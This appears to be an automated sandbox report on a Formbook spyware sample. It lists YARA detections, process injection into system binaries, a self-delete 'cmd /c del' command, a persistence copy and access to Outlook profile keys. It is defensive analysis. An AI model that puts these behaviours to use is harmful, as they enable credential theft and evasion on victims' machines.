          Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: Scan_06032020.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: ufipp6ljxlz.exe.5.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@16/8@9/4
          Source: C:\Users\user\Desktop\Scan_06032020.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan_06032020.exe.log
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4640:120:WilError_01
          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Qor0xv4i
          Source: C:\Users\user\Desktop\Scan_06032020.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
          Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Scan_06032020.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\NETSTAT.EXE File read: C:\Windows\System32\drivers\etc\hosts
          Source: Scan_06032020.exe Virustotal: Detection: 16%
          Source: Scan_06032020.exe ReversingLabs: Detection: 48%
          Source: unknown Process created: C:\Users\user\Desktop\Scan_06032020.exe 'C:\Users\user\Desktop\Scan_06032020.exe'
          Source: unknown Process created: C:\Users\user\Desktop\Scan_06032020.exe {path}
          Source: unknown Process created: C:\Users\user\Desktop\Scan_06032020.exe {path}
          Source: unknown Process created: C:\Users\user\Desktop\Scan_06032020.exe {path}
          Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scan_06032020.exe'
          Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown Process created: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe
          Source: unknown Process created: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe {path}
          Source: unknown Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Users\user\Desktop\Scan_06032020.exe Process created: C:\Users\user\Desktop\Scan_06032020.exe {path}
          Source: C:\Users\user\Desktop\Scan_06032020.exe Process created: C:\Users\user\Desktop\Scan_06032020.exe {path}
          Source: C:\Users\user\Desktop\Scan_06032020.exe Process created: C:\Users\user\Desktop\Scan_06032020.exe {path}
          Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scan_06032020.exe'
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe Process created: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exe {path}
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
          Source: C:\Windows\SysWOW64\NETSTAT.EXE File written: C:\Users\user\AppData\Roaming\N629P6-6\N62logri.ini
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Scan_06032020.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Scan_06032020.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Scan_06032020.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: Scan_06032020.exe, 00000004.00000002.603915424.0000000000FF0000.00000040.00000001.sdmp
          Source: Binary string: NvidiaCache.pdbh/~/ p/_CorDllMainmscoree.dll source: Scan_06032020.exe
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.572974242.00000000060D0000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Scan_06032020.exe, 00000004.00000002.603915424.0000000000FF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Scan_06032020.exe, 00000004.00000002.605673686.0000000001B0F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1161211025.00000000034EF000.00000040.00000001.sdmp, ufipp6ljxlz.exe, 00000011.00000002.893588814.0000000001310000.00000040.00000001.sdmp, wlanext.exe, 00000012.00000002.897934309.0000000002C80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Scan_06032020.exe, 00000004.00000002.605673686.0000000001B0F000.00000040.00000001.sdmp, NETSTAT.EXE, ufipp6ljxlz.exe, 00000011.00000002.893588814.0000000001310000.00000040.00000001.sdmp, wlanext.exe, 00000012.00000002.897934309.0000000002C80000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdb source: ufipp6ljxlz.exe, 00000011.00000002.893303514.0000000000EE9000.00000004.00000020.sdmp
          Source: Binary string: NvidiaCache.pdb source: ufipp6ljxlz.exe, Scan_06032020.exe
          Source: Binary string: wlanext.pdbGCTL source: ufipp6ljxlz.exe, 00000011.00000002.893303514.0000000000EE9000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.572974242.00000000060D0000.00000002.00000001.sdmp

          Source: initial sample Static PE information: section name: .text entropy: 7.50780314638